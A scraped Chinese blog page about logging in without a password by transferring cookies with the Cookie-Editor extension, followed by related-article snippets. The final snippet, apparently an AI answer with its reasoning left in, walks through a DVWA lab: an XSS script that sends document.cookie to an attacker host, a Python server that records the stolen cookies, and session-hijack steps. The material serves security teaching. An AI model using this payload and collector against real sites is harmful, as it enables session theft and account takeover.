cookie远端免密登录小实验

最新推荐文章于 2025-09-12 07:39:17 发布

原创

最新推荐文章于 2025-09-12 07:39:17 发布 · 2.5k 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#前端 #github

本次将讲述使用cookie editor插件进行远端免密登录，首先搜索cookie editor进行下载，网址为

Cookie-Editor - A safe cookie editor for Chrome, Firefox, Safari, Edge and Opera (cgagnier.ca)

该插件有对应的浏览器版本

安装完后进行实验

首先登录网站选择为豆瓣网，浏览器选择edge和firefox

首先用火狐打开豆瓣登录界面

这里显示还没有登录，然后用自己的账号密码登录

登陆进去后点右上角的扩展

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

wlopghost

关注关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

2021年自动获取系统登录Cookie的浏览器插件

码蝗的博客

03-24

1416

最近公司需要做一个电商平台店铺统计的系统，大致的需求是将某电商平台的多个店铺数据全部进行收集，放到公司内部自己的系统里进行管理和分析。为了获取店铺在电商平台的数据，就必须要解决电商平台的登录Cookie问题，拿到登录的Cookie后用接口模拟请拿到数据。为了图方便省事，于是写了一个小小的浏览器插件，专门用于获取登录Cookie，以下简单的对插件作一些介绍。 1.manifest.json 文件 \ { "manifest_version": 2, "name": "电商系统插件", ...

加载cookiese，更新cookies，防止一直登录的烦人情况。使用已经安装的插件，更好的操作。

weixin_42771529的博客

05-06

1463

使用一个自定义的用户配置文件（user profile 或 user data directory），在这个配置文件中安装扩展，并在 WebDriver 启动时使用这个配置文件。如果你希望扩展在 WebDriver 启动之前就已经安装好，可以在手动操作浏览器时安装扩展，或者使用一些自动化脚本来预先安装扩展到用户配置文件中。如果你需要在 Selenium 测试中加载特定的扩展，你通常需要知道扩展的 ID 或者扩展文件的确切路径。：在浏览器中，扩展 ID 通常可以在扩展的详细信息页面找到。

1 条评论您还未登录，请先登录后发表或查看评论

Cookie-Editor 安装与配置完全指南

最新发布

gitblog_07416的博客

09-12

837

Cookie-Editor 是一个强大的浏览器扩展程序，它允许用户在不离开当前标签页的情况下创建、编辑和删除Cookies。该项目专为提高生产力设计，简洁而安全，适合网页开发测试以及手动管理您的Cookies以保护隐私。主要编程语言包括JavaScript、HTML、CSS，并且对于Safari版本，还需涉及Swift和PowerShell（编译时）。 ## 关键技术和框架 - **浏览器扩展...

cookies插件

Hanzwii的博客

01-25

650

npm i cookiesvar Cookies = require("cookies"); app.use(function(req,res,next){ req.cookies = new Cookies(req,res); req.userinfo = {}; if(req.cookies.get("userinfo")){ try{

使用插件快速获取cookies

m0_73689941的博客

06-27

6136

在使用需要用cookies的工具时，这个插件可以快速方便的获取cookies

cookies插件，记住cookies

weixin_30345055的博客

12-30

146

今天同事交给了我一个记住cookies插件，首先先去网上下载一个jquery.cookie.js文件文件下载 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> ...

Python3+selenium实现cookie免密登录的示例代码

09-17

### Python3+selenium实现Cookie免密登录的详细解析 #### 一、背景介绍在现代Web开发中，Cookie被广泛用于会话管理。利用Cookie进行免密登录是一种常见的技术手段，尤其是在自动化测试或爬虫应用中。本文将详细...

SpringBoot整合Shiro后实现免密登录

04-11

SpringBoot整合Shiro后实现免密登录 1，说明一下步骤，需要在原来基础新增三个文件 2，新增CustomToken，重写UsernamePasswordToken免密登录调用方法和密码登录调用方法都在里面。 3，新增...

selenium使用cookie管理进行免密登录博客园

weixin_45336222的博客

11-24

1204

博客园这个比较特殊，正常我们在页面操作过程中只需要传入name和value值就好了，但是博客园不行需要除了expiry字段外所有的信息都要传入，否则无法登录，所以我们要在一种方法不行的情况下多尝试一下其他方法。在了解cookie的原理后，我们知道登录后我们客户端会生成cookie保存用户信息，所以我们在selenium的方法中就有我们的。方法进行cookie的信息获取，等打开新页面后我们要实现登录，只要把对应cookie添加到浏览器中即可，所以有我们的。

cookie操作插件

11-24

对cookie操作插件可满足对cookie的大多数操作比如得到cookie值设置cookie值

jq cookie 插件使用增删改查以及拓展之管理用户登录状态

amoxu

04-21

957

jQuery Cookie官网地址：http://plugins.jquery.com/cookie/jQuery Cookie Github地址：https://github.com/carhartl/jquery-cookie 由于jQuery.Cookie依赖jQuery，使用之前需要先引入jQuery，然后再引用jQuery.Cookie 该插件也可以作为AMD或Comm...

Cookie插件使用--记住用户名和密码

qq_20867981的博客

07-28

803

导入jquery和 cookie的js <script type="text/javascript" src="<%=basePath %>js/jquery-1.8.3.min.js"></script> <script type="text/javascript" src="<%=basePath %>

web无加密连接linux终端,Webauthn实现浏览器无密码登录

weixin_39690963的博客

05-05

543

1. 什么是WebauthnWebAuthn(Web 身份验证)是由万维网联盟(W3C)发布的 Web 标准。WebAuthn 是 FIDO 联盟指导下的 FIDO2 项目的核心组成部分。该项目的目标是标准化用户对基于 Web 的应用程序和服务的公钥认证的接口。WebAuthn全称Web Authentication API 使用asymmetric (public-key) cryptograp...

使用Cookie登录网页

热门推荐

weixin_52690231的博客

03-03

2万+

使用Cookie登录网页

共享账号cookies的实现，分享cookie可实现异地登录

2302_77576977的博客

10-24

1742

然后我们要登录一个网页，登录后，这个网页的cookies就包含你的个人信息，这时候，我们就需要导出（Export）<Json>格式的cookies，然后我们就可以在安装了这个插件的账号导入（Import）你的cookies，然后刷新一下网页，之后你就可以登录账号了，（这个适合90%的网页账号共享）如果你用的是Chrome浏览器的话，需要进入设置，然后打开扩展程序，如果可以科学上网的话，可以直接搜索这个插件，不行的话就点击点击下面链接，然后在扩展程序上打开开发者模式，拖动安装。

Cookie设置三天免密登录（运行教程）

我是老伯的博客

02-12

8273

Cookie设置三天免密登录

「jQuery系列」jQuery Cookie插件功能介绍

日常笔记/总结/系列知识梳理

03-14

3137

jQuery Cookie 插件是一个用于处理浏览器 cookies 的 jQuery 扩展插件。它提供了一种简单、方便的方式来读取、写入和删除 cookies，而无需编写复杂的 JavaScript 代码。

windows系统edge浏览器退出账户后还能免密登录的解决方式

weixin_43758633的博客

09-08

1万+

edge浏览器明明退出登录了，还能不用输密码一键点击就能登录；这是因为微软的煞笔产品经理用脚后跟想出来的方案。最后再说一句，煞笔微软。

利用本地cookie跨浏览器登录

qq_44875230的博客

02-05

7483

利用本地cookie跨浏览器登录一、工具准备：安装Cookie Editor插件谷歌浏览器Edge浏览器二、导出导入cookie后刷新登陆注：安装插件失败的处理办法一、工具准备：安装Cookie Editor插件 Tips：本文章使用的是Google和Microsoft Edge浏览器谷歌浏览器下载谷歌浏览器插件链接：https://pan.baidu.com/s/1iNdWu0nr5K0r3HLH_ICdEQ 提取码：u9qw 在浏览器上方地址栏输入chrome://extensions/

dvwa xss cookie免密登录

03-30

<think>好的，我现在需要帮助用户找到关于DVWA中通过XSS漏洞利用Cookie实现免密登录的方法或教程。首先，我得回顾一下用户提供的引用内容，这些引用提到了反射型XSS、存储型XSS以及如何获取cookie并实现免密登录的具体步骤。首先，用户的问题集中在DVWA环境下利用XSS漏洞盗取cookie并免密登录。根据引用[1]，反射型XSS需要诱使用户点击恶意链接，而存储型XSS则是将恶意代码存储在服务器上，比如留言板，这样任何用户访问该页面都会触发。引用[2]和[3]详细描述了实验过程，包括生成cookie文件、删除现有cookie、重新登录以及修改cookie来访问系统。接下来，我需要整理这些步骤，确保逻辑清晰。可能需要分步骤说明存储型XSS的攻击流程，比如构造恶意脚本、提交到DVWA、诱使用户访问、获取cookie，然后利用该cookie进行免密登录。同时，需要强调DVWA的cookie有时间限制，所以获取后需尽快使用，这点在引用[2]中提到过。另外，用户可能需要具体的代码示例，比如如何用JavaScript窃取cookie并发送到攻击者的服务器。引用[3]中提到了生成getcookietxt文件，这里可能需要解释如何设置一个简单的HTTP服务来接收cookie数据，比如使用Python的http.server模块。还要注意用户提到的免密登录步骤，即通过修改浏览器中的cookie值来冒充用户。引用[3]中的检查元素、删除cookie、修改cookie值等操作需要详细说明，确保用户能按照步骤操作。同时，可能需要提醒用户实验环境的安全性，避免在真实环境中测试。最后，生成相关问题时要围绕XSS的类型、防御措施、DVWA的其他漏洞利用以及cookie的安全保护方法，这些问题能帮助用户进一步扩展知识。</think>### DVWA XSS漏洞利用Cookie免密登录实现步骤根据您提供的引用资料，DVWA中XSS漏洞利用Cookie实现免密登录的核心步骤如下： #### 一、存储型XSS攻击实施 1. **构造恶意脚本** ```javascript <script> new Image().src='http://攻击者IP/getcookie.php?c='+document.cookie; </script> ``` 该脚本会将用户cookie发送到攻击者服务器（需提前部署接收接口）[^3] 2. **注入恶意代码** - 登录DVWA进入"XSS Stored"模块 - 在留言板输入上述脚本提交 ```python # 接收cookie的Python示例（需运行在攻击机） from http.server import BaseHTTPRequestHandler, HTTPServer class Handler(BaseHTTPRequestHandler): def do_GET(self): with open("cookies.txt","a") as f: f.write(self.path[8:] + "\n") self.send_response(301) self.send_header('Location','http://目标DVWA地址') self.end_headers() HTTPServer(('0.0.0.0', 80), Handler).serve_forever() ``` #### 二、Cookie劫持与利用 1. **获取受害者Cookie** - 当用户访问含恶意脚本的页面时 - 攻击机自动记录cookie到`cookies.txt`[^3] 2. **免密登录操作**： ```markdown 1. 清除本地DVWA Cookie（浏览器开发者工具→Application→Clear Cookies） 2. 使用任意错误凭证尝试登录（触发新Cookie生成） 3. 修改`PHPSESSID`为盗取的Cookie值 4. 刷新页面即完成登录[^2] ``` #### 三、关键注意事项 1. DVWA的Cookie有效期约15分钟，需及时使用 2. 实验需保证攻击机与DVWA网络互通 3. 存储型XSS比反射型更危险，因其自动传播[^1]